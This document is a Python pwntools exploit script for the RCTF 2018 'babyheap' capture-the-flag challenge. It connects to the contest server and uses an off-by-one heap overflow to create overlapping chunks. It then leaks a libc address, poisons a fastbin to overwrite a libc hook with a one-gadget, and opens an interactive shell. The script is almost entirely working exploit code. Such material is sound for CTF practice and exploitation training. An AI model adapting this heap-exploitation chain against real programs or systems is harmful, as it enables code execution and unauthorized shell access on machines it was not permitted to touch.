#!/usr/bin/env python
# RCTF 2018 babyheap pwn
from pwn import *

# Terminal that gdb.debug()/gdb.attach() open their window in: a horizontal tmux split.
context(terminal=['tmux', 'splitw', '-h'])
# context(terminal=['tmux', 'new-window'])  # alternative: open a new tmux window
# libc = ELF('./libc.so.6')

# Target binary; the architecture for pwntools is taken from the binary itself.
elf = ELF('./babyheap')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # verbose pwntools I/O log

# Remote service and local replay endpoints, chosen by the CLI option parsed further down.
RHOST = "babyheap.2018.teamrois.cn"
RPORT = 3154
LHOST = "127.0.0.1"
LPORT = 3154
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of section ``name`` in ``elf``.

    ``elf`` defaults to the module-level target binary loaded above.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log the value of the expression ``ss`` in hex, e.g. ``dbg('libc_base')``.

    NOTE: ``eval`` is used deliberately so a variable can be logged by its
    name string (resolved against this module's globals). It is a full
    expression evaluator; only ever pass trusted literal identifiers written
    in this file, never anything derived from the target or the network.
    """
    value = eval(ss)
    log.info("%s: 0x%x" % (ss, value))
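conn = None
# First CLI argument selects the target and is consumed so pwntools does not
# parse it itself: 'r' remote service, 'l' local listener on LPORT, 'd' run
# under gdb, 'a' attach gdb after spawning; anything else runs the binary.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'
if opt in ('r', 'l'):
    # Tuple membership, not `opt in 'rl'`: the substring test also accepted
    # '' and 'rl', which then raised KeyError on the endpoint lookup.
    endpoints = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*endpoints[opt])
elif opt == 'd':
    # The script has no placeholders, so the previous .format(...) of the
    # main/entry address was a no-op and has been dropped.
    gdbscript = """
continue
"""
    conn = gdb.debug(['./babyheap'], gdbscript=gdbscript)
else:
    conn = process(['./babyheap'])
    # conn = process(['./babyheap'], env={'LD_PRELOAD': './libc.so.6'})
if opt == 'a':
    gdb.attach(conn)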
# exploit
def alloc(size, content):
    """Menu option 1: request an item of ``size`` bytes holding ``content``.

    ``content`` is sent raw (no newline is appended), so the caller decides
    whether a trailing newline is part of it. Returns once the menu text
    '1. Alloc' has been seen again.
    """
    send_line = conn.sendlineafter
    send_line('choice: ', '1')
    send_line('size: ', str(size))
    conn.sendafter('content: ', content)
    conn.recvuntil('1. Alloc')
def show(idx):
    """Menu option 2: ask the target to display item ``idx``.

    The response is not consumed here; the caller reads it from ``conn``.
    """
    for prompt, answer in (('choice: ', '2'), ('index: ', str(idx))):
        conn.sendlineafter(prompt, answer)
def delete(idx):
    """Menu option 3: delete item ``idx``, then wait for the menu to reappear."""
    for prompt, answer in (('choice: ', '3'), ('index: ', str(idx))):
        conn.sendlineafter(prompt, answer)
    conn.recvuntil('1. Alloc')
log.info('Pwning')
# Every size, offset and payload below is tied to the exact binary and libc
# build this was written against; only libc_base is derived at runtime.
# Treat the sequence as a reproducer for that build, not something portable.
alloc(0x38, 'x'*0x20+'\n')
payload = 'y'* 0xf0 + p64(0x100) + '\xa0'
alloc(0x100, payload + '\n')
alloc(0x88, 'z'*0x20+'\n')
alloc(0x68, 'banpei\n')
delete(1)
delete(0)
alloc(0x38, 'x'*0x30+p64(0x40))
alloc(0x88, 'hoge\n')
alloc(0x60, 'fugafuga\n')
delete(1)
delete(2)
alloc(0x80, 'a'*0x70+'\n')
show(4)
conn.recvuntil('content: ')
# Reads 6 bytes of the displayed content, zero-extends them to a little-endian
# 64-bit value and subtracts a hard-coded, libc-build-specific offset.
# NOTE(review): recv(6) may return fewer than 6 bytes on a slow connection,
# which silently corrupts libc_base; recvn(6) waits for the full count.
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c4b78
dbg('libc_base')
delete(1)
payload = 'z'*0x80
payload += p64(0) + p64(0x71) + 'hack'
alloc(0xf0, payload+'\n')
delete(4)
delete(1)
payload = 'z'*0x80
# The two constants added to libc_base below are also build-specific offsets.
payload += p64(0) + p64(0x71) + p64(libc_base + 0x3c4aed)
alloc(0xf0, payload+'\n')
alloc(0x68, 'hoge\n')
payload = '\x00'*3 + p64(0)*2 + p64(libc_base + 0x4526a)
alloc(0x68, payload + '\n')
# Two further menu selections, then the session is handed to the user.
conn.sendline('1')
conn.sendline('1')
conn.interactive()